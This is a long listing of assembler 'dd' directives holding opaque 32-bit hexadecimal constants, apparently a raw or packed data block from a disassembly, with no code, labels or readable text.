dd 6564628Ah, 2DE76666h, 87974EFFh, 0A7B616Fh, 2098D72h
dd 9385B4B7h, 0D3EFFF7Ah, 657C9622h, 83FF691Bh, 93858483h
dd 0FFADCC08h, 0D786E176h, 90E98CF6h, 97EB9EFDh, 584697ECh
dd 0E00AC90Eh, 0E3FCC5Fh
dd 0E9EA237Ch, 0E5E538Ah, 0DF2C7A9Ah, 0C7987AFFh, 0BDC4FFB9h
dd 0C04E7FC7h, 0C3FFC329h, 4881C5C4h, 0FF36ED8Ch, 25CD3E0Ah
dd 392FDFCDh, 0F69BD0F2h, 0FF3033F5h, 0B1B9E00Ah, 0FFE7E70Dh
dd 669AE9E8h, 4EAC988h, 8EFEF2FFh, 1DF50632h, 0D935FFF5h
dd 0FE82E8FBh, 878DFE81h, 0B8C2FFFFh, 8F3C7CCh, 0BFFF9C8h
dd 0F0E0CE4h, 0FE9D6310h, 6CE93057h, 0AD186314h, 1D1DFF11h
dd 0AC871F1Eh, 20FF0746h, 29562555h, 0FF29C1C0h, 2DC5E023h
dd 32DA213Fh, 0F836FF1Bh, 1E5DB575h, 3DE1DF3Fh, 0F043AB0Bh
dd 46AF638Fh, 0A2A1C1BFh, 52A68948h, 7082EAB5h, 749E0EDFh
dd 0FF1B57BDh, 0D469FF59h, 0B7A27918h, 62FF6161h, 22EA6A63h
dd 0FC829443h, 0E66F6468h, 0E079B15h, 76749C78h, 0A372D677h
dd 0BF8158FFh, 816A808Bh, 0C16026FFh, 0EB49846Dh, 17DD0A1Ah
dd 0FF9167E1h, 1C939291h, 64B3D21Ah, 9C2A71B7h, 1018FF9Dh
dd 0D35E85E4h, 0A7FFD4A7h, 0A5AB4373h, 0FFAE4744h, 597BABD8h
dd 0B5B4B3B3h, 0FC3830FFh, 0BE50469Dh, 544BFFFFh, 2BB22BC2h
dd 0C68BC5C5h, 0E384425Bh, 1AFFC8EFh, 0CF0EB3A3h, 0FF1E4C66h
dd 0E20AE112h, 0E4E6E5E4h, 0CEAD67FFh, 84B9BC17h, 0F31BFFEBh
dd 0F71FB5FDh, 13FFD73Bh, 0E8ED37FAh, 0E2FF0F3Ch, 0D17B0278h
dd 940E1F80h, 0ED13E437h, 0FF348AFFh, 66D71917h, 1A65E11Ah
dd 0BF41E11Dh, 2323C90Bh, 50F82524h, 2E0D4CAAh, 56A21DDFh
dd 0FCFF32C4h, 46374112h, 0F04E3D37h, 43A4D3Ah, 0FFAA0E4Dh
dd 39174C40h, 7D493A45h, 0A349A1DBh, 524FFE26h, 55BB5251h
dd 18FF9755h, 7F3EFFD4h, 5FAA9C58h, 629796A1h, 0FF18FB6Ah
dd 0FF9A08CFh, 9ECE0C70h, 0DAD2A875h, 7C7A92FDh, 2C577E7Dh
dd 166FA699h, 0FD399E86h, 8B8B6102h, 682F8D8Ch, 0FF96B5F4h
dd 8F319778h, 629A734Ah, 301793C0h, 10FFC70Eh, 8DECE128h
dd 0A27F1D56h, 0B1B14797h, 39B3FFB2h, 4493F23Ah, 0C6DBB9C5h
dd 0BBE8FBDh, 73FFC296h, 3BE2814Bh, 0FFB7CAB4h, 0CC262ECAh
dd 3986D2C0h, 0F519D1FCh, 2FD8D63Eh, 99531CFFh, 2123FAFFh
dd 0E708E213h, 4238C60Ch, 574AF2FFh, 5785F2D2h, 0B6FC3512h
dd 0F8E6DE82h, 0D28AE6FEh, 572A517h, 47205FFh, 0CA6D087Dh
dd 0F90D80FEh, 0F0BFC50Eh, 1C1B1A18h, 5B91FDF8h, 22CADD04h
dd 0A026FFBFh, 0FF0E4DA5h, 2E2CC42Fh, 0BDBC302Fh, 0C91077FDh
dd 0BF3836DEh, 59B15A84h, 0A8E93B1Ah, 7FFF4240h, 6C03C998h
dd 0BDC28BB5h, 40FEFF4Ch, 0AB01AEABh, 2197DF95h, 0FF5B2E5Bh
dd 2D5E2EDCh, 608AD85Eh, 0A172328Dh, 0FF424364h, 6F851DB7h
dd 71706FFFh, 5110FE77h, 7B9CFE72h, 0BDCB5B19h, 82E8B78Ch
dd 6B94FF4Bh, 87868585h, 0EEFF04D1h, 794C88AFh, 0C4937B8Fh
dd 0E3FF307h, 0DBDF159Eh, 0AFA561B8h, 0F8FF21ADh, 4F24EF03h
dd 0ABFFDFA9h, 0F6EA22E7h, 0B05A4C8Bh, 0B75DEB34h, 34FE5BFFh
dd 4299F8FBh, 7FFFC157h, 0A248F3C3h, 91E9CCE3h, 7FFFCA22h
dd 955FCFCEh, 3FFF2FF6h, 659804D6h, 0F816D832h, 0D0DC36FCh
dd 900E2F6Ch, 0FF5AE6FAh, 0F988F58Bh, 0FC0C3B26h, 0BEFD16FFh
dd 2EA8331h, 605FE04h, 2E4D87D2h, 0ADFF31F7h, 30FC9D86h
dd 18E4D711h, 0F72A6FD8h, 42FF111Fh, 22572254h, 0FE24CE34h
dd 29C21B28h, 37A6266Bh, 0FF11FDFFh, 34413046h, 768F3861h
dd 8B343CFFh, 14B22A6Ah, 0C35AFF7Bh, 0C4396226h, 3FF618Ah
dd 5C4BA3Eh, 0FFDA34A3h, 87D16303h, 5C58DE59h, 0FFDFFF4Bh
dd 62B4A195h, 658B42ACh, 0E6EB672Fh, 904F2EFFh, 711A6D19h
dd 7199F05Eh, 0FF2F1E7Bh, 2CA76D61h, 75BF2F6Dh, 82A56A81h
dd 80868DFFh, 77AECDFFh, 0AF438F67h, 9267D651h, 884033FFh
dd 0B1CC0E79h, 0E4A5A66h, 45FC33ADh, 5A917DADh, 0B6FF6FB2h
dd 0DDFD35C2h, 4F7DBF9Eh, 22FF8CBEh, 0CB3A08FFh, 0DAFA9AE5h
dd 0D496D9A9h, 60CFFFDCh, 0A31DFF6Fh, 0B6DFFF30h, 0E30B3C55h
dd 92FEC32Fh, 3CE691E6h, 1D34E802h, 71D1FF2Fh, 63338D2Fh
dd 46F51EFFh, 0FA12DA57h, 0FEFDFFFCh, 26658D39h, 7FFEF07h
dd 8E0A209h, 0F80C0B0Ah, 346B8320h, 0FB0E8F15h, 3E5D9716h
dd 0BBFFFE7h, 2259225Ah, 0D5E4F0B1h, 0F22EC327h, 0FF057283h
dd 8CAB35C1h, 5DFF23FFh, 3F6072BDh, 0FFC9FF1Fh, 484747ADh
dd 28C6D949h, 0A44A69FFh, 0B8BB5E52h, 0FF5AFF56h, 0D1745BBCh
dd 5EF02A0Ah, 0BF9F5E29h, 0A444AEFFh, 596F6792h, 0FE87B176h
dd 2154C96Eh, 917383B0h, 951F9FFFh, 0FD04F57Dh, 0E4BF80FCh
dd 208B6C06h, 0FFB3B704h, 0C2147B81h, 420E380Eh, 0A24A4E0Eh
dd 0DA6FF37h, 8EED27FFh, 0F78DC657h, 0BEB2FC44h, 0BAB6589Ch
dd 0FFB9120Bh, 0FABBBAB9h, 0C49BDA30h, 0C33400FAh, 0FF5FC42Ch
dd 0AF475EC8h, 26C9E8F2h, 45D2FFCEh, 0D3F2B159h, 39DBFF33h
dd 0DE2A1D6Fh, 9E0E334h, 0FF6F94A8h, 0BFEB0309h, 0EC045CE1h
dd 0D4F076FFh, 0F1D0FE5Dh, 0F9F8F61Eh, 99713DDFh, 7016FBDAh
dd 0FF23CFEDh, 0B893C3C1h, 462BC7FFh, 0FFBFA0FFh, 6F915FDh
dd 1C1AF29Ch, 45AD557Fh, 0C0A72706h, 0FFBF5EE2h, 2DC38926h
dd 0FDFF1B2Dh, 1756BCF6h, 73E25630h, 0DE0EBF45h, 6504E2B0h
dd 71DD5CBEh, 0FD0E46B1h, 0F64EA054h, 0B6FFD412h, 0D6DCFF8Fh
dd 0A07FFF1Eh, 0D8485CB6h, 63816389h, 0EADC7EFFh, 256E4D0Ch
dd 56F2CBFFh, 0C529ABCh, 78F46A85h, 0BF7D93D2h, 0C3C7FFFh
dd 8088A7E6h, 4900E7Ah, 0D16F700Eh, 16E3FF8Fh, 60BFD2DEh
dd 7FF783FFh, 0F3EF63C8h, 0CF8D99Dh, 0D32FA6E1h, 8C58D480h
dd 0DFE829FFh, 0CE35FEC8h, 0B3BCF1CCh, 0FF38C8C0h, 0E3FF0EA7h
dd 2CEB8A42h, 0C5ACD1AFh, 25BF11D5h, 0D931F915h, 0A2B6FFFCh
dd 0B7E09DDCh, 94EDE793h, 0C8FF4CE7h, 75FD4A0Bh, 9D0B77Dh
dd 8FFF0E06h, 86FD8CF9h, 0E9FCFC15h, 0F6C296E1h, 0FFFF5805h
dd 2A6981CAh, 0FF10F80Bh, 76141312h, 0E53C5399h, 719F1FFh
dd 0CC549731h, 23D7FFE0h, 7EB27CFh, 2AFF28C0h, 0A3AC2C2Bh
dd 235144Bh, 0B7D93FFFh, 2EC71E7Dh, 6F4DF169h, 0BF88A77Bh
dd 4FFFC416h, 50B863DDh, 54FF5352h, 7C13D948h, 0FF5820A5h
dd 0B4775C27h, 4F897B63h, 0AB678FFFh, 536A8347h, 867BFF75h
dd 9A34606Ch, 0A6FFB771h, 0AD759DA1h, 0FF78060Dh, 94877C01h
dd 0A2C92983h, 83C47846h, 6E65FFB9h, 9364A2BEh, 0FF1957B0h
dd 9B73232Fh, 7752F695h, 0FF54539Fh, 4FBAFDA3h, 0FF3492A7h
dd 0AAD3AAD0h, 0A2AD4692h, 0FFE9FAC6h, 0FDE2C12Dh, 0E3F479Eh
dd 87FF4D4Fh, 0C52D39E0h, 0FD21BEC7h, 0F62C3C9h, 1BFD03Ah
dd 0D73DF41Eh, 0C5FF5BD7h, 0F9B856FFh, 0AFE234DAh, 3A022F0Bh
dd 0ED50FF65h, 6ECABEBh, 84F2E0ECh, 0FCF3F319h, 0DDBC782Ch
dd 171D1A06h, 0F10214C8h, 6E822CCh, 0BECE12Fh, 790FC5EAh
dd 94EBFFBBh, 371618FFh, 6E1D3CA5h, 255A81FFh, 503D4B28h
dd 245720FEh, 2929CF76h, 0A297FFDFh, 0CCFF0B6Ah, 0EF3C30DAh
dd 0F0B035DEh, 3AD23E0Bh, 7B3EFFBFh, 0F16605CFh, 4644ACBFh
dd 0C707FFBFh, 0FB49682Fh, 0B950BF8Fh, 557EFF53h, 7D3CDA0Bh
dd 5EA5860Dh, 0B036FFE1h, 97E84888h, 6FFF364Ch, 627A3969h
dd 0D447792Ch, 16BF543Fh, 9E537500h, 7978FF76h, 39F3797Ah
dd 68E2835Ah, 0FF5A8280h, 0ACA55F29h, 0FF88F28Dh, 4E388CF5h
dd 91799162h, 0E8C23646h, 698F4B1h, 9ED12F73h, 2EFE609Fh
dd 645887E6h, 0FF0EA754h, 0AC44AFFFh, 0B0B0AFAEh, 90F7FF3Dh
dd 20B55D49h, 0B8FE5185h
dd 0C1A62728h, 478DBEC3h, 7DC72FFEh, 0BFCABC5Dh, 0FF06BF05h
dd 9076DF22h, 0F4A12AF1h, 0BCDBAEDBh, 93D1216Fh, 0CA21D463h
dd 936054BAh, 0FF427485h, 0E1F3734h, 20BC1F7h, 0EF21FFBBh
dd 0FE014643h, 1E9C401h, 0FF11970Bh, 0FF0B449Dh, 0FF3383DFh
dd 0FF4603A0h, 0D1E37F3Bh, 27FFCD24h, 86292827h, 0FF0948A6h
dd 4C33532Ah, 0C5F5A033h, 39DF36E5h, 0B06A3BFDh, 35441B5Ah
dd 0E12E88FFh, 0E8BD048h, 34C256FFh, 2255675h, 0F057FF31h
dd 0A7555BB3h, 4C06ABCDh, 2B00E9BFh, 0F0FF64F6h, 26896436h
dd 219A9251h, 131324F3h, 4720D145h, 13265DC0h, 23580CC6h
dd 8C933878h, 59234050h, 53DCD543h, 17A22EF6h, 1F0744E0h
dd 0A9B551CFh, 0C7E2DB7Dh, 63158F29h, 80F1D8h, 61A2CACh
dd 0B9AD08BBh, 40000CFFh, 0B0FBA00h, 0FA166FB8h, 0D0DFFF51h
dd 56DE71BEh, 1F2160CBh, 2B29AE06h, 20527835h, 8569AF5Dh
dd 0D42257BCh, 216111FEh, 0EA89F0D9h, 97CC9764h, 30102045h
dd 0F7A208F4h, 3FCACD5Dh, 4D2D0244h, 74FF084h, 377A8314h
dd 8FE4FB10h, 7CEE8C03h, 5FBB114Fh, 0E1C1376h, 56B0003Bh
dd 0C12AFC38h, 0AFBB01E1h, 0AD2B6006h, 0D48003CFh, 3DD0655Ch
dd 8B9C628Dh, 0DB4E9D03h, 78A80F6Fh, 0C05F6378h, 35F68404h
dd 4F2BF85Ah, 38B52045h, 4D43BDA0h, 9D1A6C84h, 108C600Fh
dd 76280288h, 0FEEF03ACh, 838A9FEDh, 452EC324h, 958009C9h
dd 1E18B48Ch, 0D6042325h, 0E033AF6Dh, 4A89F7E1h, 44C39325h
dd 0B4DF5360h, 0CC40BE2Ch, 0C118EA72h, 64C5372Ch, 0CAE8808Ch
dd 249A08Eh, 0A9C3011Ch, 6C7708B2h, 0FF184E2Bh, 1F80CF43h
dd 0AFE878EDh, 76651BCBh, 0E10067F5h, 7B4D37CFh, 9F25053h
dd 0D8C4FBAh, 0DC526297h, 0DA6AD9FFh, 6A522768h, 4F8BFFF8h
dd 52675728h, 86B52469h, 0AB071B0Bh, 8734086Eh, 684F03FDh
dd 0F43229DFh, 636B8BCBh, 173BFA09h, 1FC67676h, 15D8107Bh
dd 271F331Bh, 0ABEDF641h, 0FF40638Bh, 0E529FAC6h, 3B68E66Ah
dd 0B2762567h, 206F4917h, 52BBFD1Fh, 339FE7EBh, 0BCD1838Fh
dd 84D2B650h, 9B1BC666h, 0D9133BCFh, 0DF3639B3h, 0DB074BCAh
dd 68DC6AF6h, 5DED087Dh, 3BED1913h, 0DB0458F0h, 69AC0638h
dd 80581DBh, 0F0AED802h, 7CFCD936h, 0B1402E37h, 4A43B109h
dd 8D8D786Dh, 2193B40Dh, 36DF2486h, 5BBB2809h, 0FD9356F0h
dd 655F50BEh, 748C6666h, 33015B6Ah, 64151F63h, 3D79DF29h
dd 0E46AF6E3h, 0E5217268h, 3AEF6FACh, 0B1DB8A63h, 66841C9Fh
dd 28C31F0Fh, 1063675Dh, 9A7967CAh, 0B20D92B1h, 596C7969h
dd 32A99B09h, 8DDCF83Dh, 2F9E030Dh, 0DC6657Fh, 85DC7FCCh
dd 0DCB73A50h, 0C340580Bh, 7EB5AE68h, 595B986Ah, 0F817DF32h
dd 5CA02868h, 0FFFABEDFh, 0D00DE8E0h, 0C02BDFCDh, 3686E805h
dd 90B10F1h, 8C578A0Dh, 58CD76A7h, 36AF617h, 0DDFD0859h
dd 0B88F0148h, 0AF411BDEh, 783BABF3h, 0B8DDEC0Fh, 82AB4A55h
dd 91FAEB5Fh, 9C3EE30h, 0B161D3ADh, 89CD0630h, 89FBBA20h
dd 0F0F7C200h, 0AD7A9258h, 62090446h, 655E6811h, 0A5FFFFAEh
dd 0FF8556B2h, 0BAAFAAACh, 0C0AFBDADh, 9956FFB2h, 958D4F44h
dd 4CE0F2h, 0A47A300h, 0B0DBB90Fh, 78A8610Bh, 0E7114428h
dd 1B430E1Fh, 0F16EC00Ch, 9F49B016h, 333B26ACh, 0FA8BC0ECh
dd 478E104h, 8DCF6E26h, 0B28836E7h, 1D915224h, 1BEC039Bh
dd 9B24D14Dh, 0E83D8894h, 17119302h, 0FD02B3Eh, 4BA38301h
dd 991EB82Dh, 0DD71884Dh, 0B0029204h, 0BCD9E1D2h, 9A0C1826h
dd 0A2B79FFBh, 0FF987B04h, 0B0181375h, 0B15D88Ch, 0CBC1D4D0h
dd 17DB463Fh, 18350261h, 8237EF78h, 0A0854C9h, 0FC555270h
dd 0B056028Ah, 0BEF63E53h, 32225029h, 0AA1C5ECDh, 402D1222h
dd 448CFF83h, 1020DE92h, 80603895h, 70D8034Bh, 83C412D2h
dd 17187256h, 0F5DAC391h, 990E01EAh, 0BC05DB2Bh, 0FF35E79Dh
dd 0CE7F0E53h, 7B8A5659h, 86E0F23h, 17DE0E99h, 0DF580269h
dd 49DE08h, 1BB7BB8Eh, 0F2EEAE40h, 0F629AEAAh, 54B7BAh
dd 5EAAEE0Dh, 90F1DF0Ah, 977C230h, 0B1FE6383h, 88CD062Fh
dd 88FBEC1Fh, 0EFF694FFh, 8E63BF58h, 11E757FFh, 0FEFEAAFFh
dd 0A2D0A2A2h, 0B5AAE8B0h, 25B6D7BBh, 0AF5503B7h, 6DF0C0DBh
dd 28BDF702h, 7E4CE74Fh, 438ECCFFh, 15DBFB23h, 1BB63CCCh
dd 0B13211A9h, 468B0E5Eh, 36B4B7Bh, 255F1911h, 38957A2Ah
dd 8C82128Fh, 323CF63h, 0FFF1FFC0h, 5012948Ch, 2D64FFFFh
dd 0F11A4DD9h, 2E75E70Eh, 0C6E90086h, 7F4F0912h, 0ED1675F5h
dd 0C2A803B7h, 191DF76Ch, 635AEE6Fh, 237B1709h, 261C1909h
dd 237C70Fh, 34D8D817h, 8729D90Eh, 0D8DB2B5h, 631CEF98h
dd 677A7CBFh, 1206B6B9h, 0C08DED58h, 4AEFD4F6h, 7B04F26Bh
dd 19B3B6D9h, 732ED977h, 0DF301B58h, 0F6793E0Ah, 4007A02h
dd 4DF8360Eh, 77A20E76h, 77F44D26h, 0DFBF7802h, 740273h
dd 0FD136369h, 6BF6F765h, 7D08704Eh, 8CEC9E49h, 21BB1Bh
dd 10432FF8h, 0A72D4FFEh, 0C719631Ah, 19DED264h, 0FE7F1923h
dd 27D6C51h, 7DED257Eh, 1B8C7C04h, 0DB2520E9h, 0B1B203A3h
dd 0BE90113Fh, 4264356Dh, 0DD21861Ch, 0D90C1EF8h, 64FF1A63h
dd 9DCD952h, 48D80033h, 39B8DF0Ah, 7C02F67Bh, 0F73A5200h
dd 0E277CA9Bh, 0F3C0DEF0h, 18F291DBh, 4F50181Fh, 840DA546h
dd 211BE86Eh, 0C0A9B803h, 0A286EF4h, 0BE6F8E2h, 0AE807680h
dd 0C98FEF30h, 63FFF2C0h, 0E3E8B13h, 0BB1EAD84h, 2B65E4FEh
dd 47EE0309h, 1ED89A65h, 99C22074h, 0D0260D45h, 3FF6DE03h
dd 0D33216A3h, 0D05F47Bh, 26B5C41Bh, 0E0E4CFD3h, 0AB4967E3h
dd 913DCA7h, 24D7D911h, 7D3C0C36h, 8C512861h, 8621340Eh
dd 0DF66D8BEh, 0EC627C34h, 9EF5B3C0h, 3D4ED6BCh, 16BD6254h
dd 0B88D78BAh, 78260B24h, 0C7BED6Ch, 0B8ED2E7Bh, 0B0148412h
dd 9B5E04ECh, 6704B27Fh, 0F808FFAEh, 0C304DC77h, 0C25815A5h
dd 5ECEC617h, 5FF0D11Dh, 0EF148EC4h, 7C1ACBFFh, 7E25222Dh
dd 83B009B1h, 0E0BEC33h, 0F6EC776Ch, 0F69C138Bh, 49F22A2h
dd 93D8DBFDh, 2825F3C0h, 4F6F11C2h, 0FF8C910Eh, 3EFD8BFBh
dd 0DA6DFB13h, 0E3D16FFh, 41FC13FEh, 8B0B6FDFh, 86EBAFFh
dd 3F8DE31h, 0FE7E6F16h, 0D89A7133h, 0CE09FADAh, 0EF17DD6Bh
dd 551F9E9Fh, 3215C68Dh, 24FB1FC9h, 2DABA6Fh, 6B9F7F40h
dd 7FFB803Ch, 252AFDD9h, 494EEFECh, 161F459Bh, 0D316F711h
dd 1277053Eh, 3B13C816h, 0F6A7D673h, 0EEDA8273h, 8116ED08h
dd 0FB94ED17h, 1FB08A5h, 466FFD96h, 4FBDBE1Bh, 0EE4F530Bh
dd 0A9463529h, 76533EEBh, 6D7EEFBBh, 93BEE30h, 0F9A08C2h
dd 75BF06B1h, 0F7755F64h, 0E0717FEh, 6F9A7D58h, 0D716A6FEh
dd 7DCFFE3Bh, 0FD83FB84h, 1E798D6Ah, 0D3DA3FDh, 8E02DFFEh
dd 4DFD8DFBh, 0F6143175h, 361DCF08h, 887DB7F8h, 0E8D0D54h
dd 0D4E683A7h, 9E0C3DDBh, 0DF2656FBh, 639229BEh, 0DB20281Ah
dd 0D8621703h, 0DE1230AAh, 0B4ED3C60h, 0E7FFC125h, 82FE0A3Dh
dd 0FD81ECFBh, 66C1A5Dh, 0E30A6E75h, 49F3DC2h, 3483B74Ch
dd 38CF0D63h, 179E5C4Dh, 0DC64BE5h, 5692CF0Eh, 7C4CBE24h
dd 324F1E4Eh, 0BEB10EDFh, 0BBB3DDDh, 0ED05EF4Eh, 24FCC015h
dd 3FD22963h, 8FE083Dh, 21FBF66Dh, 0FBFB8683h, 0D3AB5B2h
dd 8821176h, 0B6003CECh, 26A289E1h, 0B06FC905h, 246D8748h
dd 0CFEBED26h, 15EE04CCh
dd 0BA0D9A8Dh, 10D50328h, 327ADEFEh, 30D9EF07h, 15362BF7h
dd 2E377943h, 5DBE1DB8h, 631E3E1Eh, 823F749h, 760498DFh
dd 0D6984275h, 3635DF03h, 0F7B665Ah, 0C6DF2397h, 5116638Ah
dd 0C7D99164h, 3177F7E9h, 0A207DA17h, 0A2EFCA7Dh, 0D67E5F90h
dd 161C6971h, 15FFF829h, 26FDFB51h, 899318EFh, 0D93C6499h
dd 59B35DD1h, 93D28EEh, 0A418C627h, 5B753FC9h, 0D889FB8Ah
dd 0DE2596FDh, 0ADFB2FB5h, 0FBFD1A88h, 0BB528FE5h, 1AE2B61Fh
dd 0D40221Bh, 538916A2h, 0EC2BFC5Fh, 0E19F153Eh, 0E929867Bh
dd 49C41822h, 0CF878432h, 2B0F8B11h, 6C15FBACh, 1196422Ch
dd 9A035EDBh, 0AA0790BAh, 9D8903DDh, 8C861D8Dh, 9E270E33h
dd 0FD37DCFCh, 0FC563F0Ah, 0EF9AFD72h, 0FEFAC57Ah, 3DF1782h
dd 0FD85FB86h, 0BBFE2DB9h, 38B0E40Bh, 6AC74318h, 7EF043FBh
dd 9D083D67h, 0F6937CE9h, 0D9926427h, 0E47A7C85h, 6FB64254h
dd 0DE4F1980h, 0E05A7D16h, 0FC1117E1h, 0EDBAFEBFh, 13C522Eh
dd 79915715h, 15DB1653h, 0FF5B755Ch, 515B2D5Bh, 57554644h
dd 488543B6h, 0B5F6034Ah, 76007B15h, 0E9D7EF1Eh, 0BAAD5B03h
dd 0A12AEF68h, 0FC8C1F95h, 45C03BF8h, 2673561Bh, 1FFA9370h
dd 62D25529h, 1C6C118Ch, 84473D9Ah, 5949FE0Eh, 1DFD426Fh
dd 0FD87FB88h, 0CE138D36h, 157D2AFEh, 0CF3A18F3h, 0EF7FC7FBh
dd 0CA037542h, 0CFA34CBDh, 0E608BB65h, 0BB0DBBEFh, 14D86603h
dd 0B0FD667Bh, 862AD1Dh, 380639ECh, 0F1F96C3Fh, 174FFD98h
dd 0A43F0Ah, 5D2BB70Bh, 631E0327h, 58270C11h, 0FEC907B0h
dd 79EFB596h, 0F8A4F41Bh, 61E7CD59h, 51DDDC29h, 8A7DB24Dh
dd 0B7B29D0Dh, 0B7B34582h, 5AB3858Ch, 3D4F982Dh, 148D2A40h
dd 0AC676009h, 3313166Ah, 0B3F3A7B3h, 0A3FABA93h, 0FE191537h
dd 0E90997CAh, 4BEDD445h, 0D40B592h, 263E3ECCh, 0BBC11F03h
dd 0CA2B6363h, 0F470EE08h, 96C72CF5h, 931DCD97h, 137A96E2h
dd 0EFD0A7F0h, 0DF30DBEFh, 19E00CF6h, 130C35C6h, 2C80BC33h
dd 3DA7347Ch, 0CDBF1D54h, 3D901E4Fh, 361B670Ah, 56111738h
dd 170A68A5h, 5FF01FCh, 65E82C65h, 0F95894Dh, 36EC438h
dd 0B428D887h, 78605175h, 7B4B6CC0h, 6D71800Fh, 9E430188h
dd 0C7C90722h, 14864818h, 0FD30D159h, 33F89D0Ch, 0DDF7A265h
dd 794CEC16h, 7321B5Bh, 0CE88793Dh, 2182030Bh, 1D44065Dh
dd 22C52692h, 0C0472ADAh, 39201h, 18C0CCD8h, 3541D081h
dd 5D8B1DBDh, 34620130h, 6EC530C1h, 1B5442FCh, 0BBF8F70Eh
dd 3D37FF07h, 3B01A9DBh, 65BBFF2Ah, 1B838911h, 6EFFA4F5h
dd 0ECD152CFh, 0FE66B2B9h, 0A7CAAF8Eh, 0DF0103F3h, 6F8FD800h
dd 6CD8FFCBh, 193682A4h, 0CFF6DECh, 0D715F9CDh, 0FF12A85Ah
dd 8978B618h, 0DC260482h, 0ABC9B8FFh, 0C6F55023h, 0F316FFABh
dd 15417883h, 0DDFF869Eh, 3C674E19h, 0FF016A52h, 0E592B5B6h
dd 0D92D012h, 0E92111FFh, 0B020102h, 5261FFA7h, 0B9AD07C5h
dd 2EFF6B7Ah, 0D6A36ECCh, 0FF9342F4h, 3BEC2915h, 0D26A0106h
dd 0A9373CFCh, 1B3C4FA8h, 2AE365E6h, 45CD389Fh, 0C04E56BFh
dd 0FFEB7A2Ch, 0C6BE6D3Ch, 0EEA2EB52h, 4DA7D4FFh, 0FD254591h
dd 0D804FFECh, 6EF0BFC7h, 0B7B71D23h, 52705130h, 52F9FFCFh
dd 41159F69h, 9512FF77h, 27D7CD45h, 1CFF3052h, 0A9D1FDBAh
dd 0FF7908ECh, 19172C55h, 2AD636FCh, 0D7546BFFh, 31DA45F9h
dd 0DBCC46EEh, 0FFCF7F01h, 1F2C221h, 0D6B70BBDh, 58CEEFEh
dd 6CECC244h, 56FECE8Dh, 0BB1FBD2Dh, 3FDF1686h, 0D8E3E9Bh
dd 3A40FFFFh, 27F85EAAh, 43B2FBDDh, 0BF779CEEh, 0B20E2F7Fh
dd 0CB532EF9h, 0FF195155h, 0EAC547C4h, 0C30B9A95h, 7E01F6DBh
dd 0B916DBB3h, 0FF91B07Fh, 0A06C899Fh, 3861E2FFh, 0AC7D0690h
dd 0A83DFF58h, 5C1CAA93h, 5FFBACC6h, 425F76EEh, 0E2817FFFh
dd 508F6E64h, 0E9AABBFFh, 0A10335B7h, 0B61FFBDh, 477062Fh
dd 0D4FF0278h, 0EF53AA89h, 0FF37EE66h, 412B2183h, 0D52B5354h
dd 6D814EFFh, 9F9BA5A2h, 2204F27Eh, 94335FDCh, 0D2FF3FB1h
dd 588F8E62h, 0D8786DC7h, 0FDFF41B7h, 25658F83h, 9780BF05h
dd 44F1BFBBh, 0A1D526FFh, 0E82A4604h, 0D51EFF2Ch, 356B8339h
dd 9B857829h, 68BBFF3Fh, 69AC73A0h, 7F0B3C3Fh, 0A998A310h
dd 0FF3F716Dh, 4DE4506Ch, 8A1E5656h, 2B8ECFFh, 53F11F23h
dd 0C3AEF0A8h, 80A101F4h, 7BE1BF7Fh, 0A1392705h, 0C97903FDh
dd 0BF2A6C3Ch, 592D3D7Fh, 15FF7365h, 0EBAA7C09h, 0DB1B52AEh
dd 0B8FFD3A9h, 9EF1D3FFh, 867A887Fh, 0D54EFF82h, 95E3C62Ah
dd 0A1FFFD8Eh, 613CC038h, 0B0BA8BCh, 90FFB2BCh, 92072645h
dd 6FA5FDD6h, 55B8C5BFh, 0A695385h, 89D5B7FFh, 0A222FF18h
dd 0ABEC5965h, 0C1FBD1EAh, 0FA501BABh, 0D4767F7Fh, 0C5FA7A86h
dd 4F69E6EDh, 0D6BFF3Fh, 0BA25CEDEh, 6EFF0520h, 40A9BF0Eh
dd 0F604793Eh, 0F697027Ah, 0E2DEFCFFh, 2FB636EBh, 0CFE17E3Fh
dd 0BFD94EDBh, 0FF1E91ADh, 73806ADDh, 0AD5218A4h, 0EC7BDCFFh
dd 999E7809h, 67A0F800h, 5F2BBD3Fh, 8E1251BFh, 759DF1Ah
dd 7ABB7DBFh, 0FC7E253Eh, 1CD5240Eh, 7F23030Bh, 0A1F73F23h
dd 4942FF8Ch, 0AA800919h, 51FF27A0h, 2C10C875h, 0FA0291DBh
dd 10779B06h, 521837A2h, 0E42DFE4Dh, 2527455h, 5A7F17B6h
dd 0CB38F67Bh, 0B7C0EA0Fh, 0FF988600h, 17F2F80Bh, 0DB7AC06h
dd 545252FFh, 0DB4D2A6Bh, 19C2FFE5h, 1A27792Ch, 7ED6ACECh
dd 0ABFF1A5Fh, 6A6F152Bh, 86F606F5h, 0FF350E79h, 0B5E17D3Fh
dd 77FF058Eh, 0F08C0325h, 859639E3h, 3FE7D47h, 0A9F62510h
dd 3F370EA1h, 7FFFD602h, 0E55D06Dh, 184EC8EBh, 0EDF9857Fh
dd 7FDFCD65h, 0E73FB7A4h, 8418FFC2h, 0DD3AD6C9h, 6BFFC457h
dd 1237A185h, 0E3D7D973h, 0FE6752AFh, 66FFFF86h, 9D121836h
dd 73FB38EEh, 5539DD9Ch, 0FFD57F7Fh, 3D39E210h, 159D62FFh
dd 4BDD9405h, 0A43F1B06h, 683FBD85h, 223F5E29h, 0AADF6840h
dd 636D15A1h, 4DCE6FDh, 0BFC13629h, 0F675497Fh, 0B1F0BA05h
dd 0A303E949h, 2E7C0ABFh, 63BA5967h, 0AFF2CBFh, 8EA1F98Ah
dd 6F860C42h, 241C99FFh, 3FA850C6h, 0D6869FDh, 0BFB90A25h
dd 9F181E50h, 3826BF7Fh, 0C0F8A274h, 29E8AABFh, 0B36FA455h
dd 0FEA8F3F3h, 0ABA1EED4h, 97251AC2h, 0FFEA57DBh, 84C6472Bh
dd 0F3651617h, 2839EFEh, 11D0EAD7h, 9A9CBF3Fh, 9DF101FFh
dd 0A1008622h, 0B6DDD31Dh, 0BF18C6FFh, 0BFB11533h, 37E1F391h
dd 193FFB4Ah, 31BFC240h, 907FFD5Fh, 0FFBF3C50h, 9BDF95FEh
dd 0E93F6E3Dh, 0FE2D0554h, 938E9F6Eh, 37B0B97Bh, 0FFD6D9B4h
dd 4EDDFB6h, 0ED167A08h, 37190EF0h, 0BF3FEF05h, 0C0EC6DFCh
dd 6795E651h, 0FF0F36BFh, 4B51FF93h, 0D30394A5h, 43E362BBh
dd 73BFD7AEh, 71FC47C9h, 2004A6B9h, 0AFB93F2Fh, 0DA7F6310h
dd 31387D3Fh, 3F5A02C2h, 20EAF3Fh, 62FF4539h, 0C3D8B69Eh
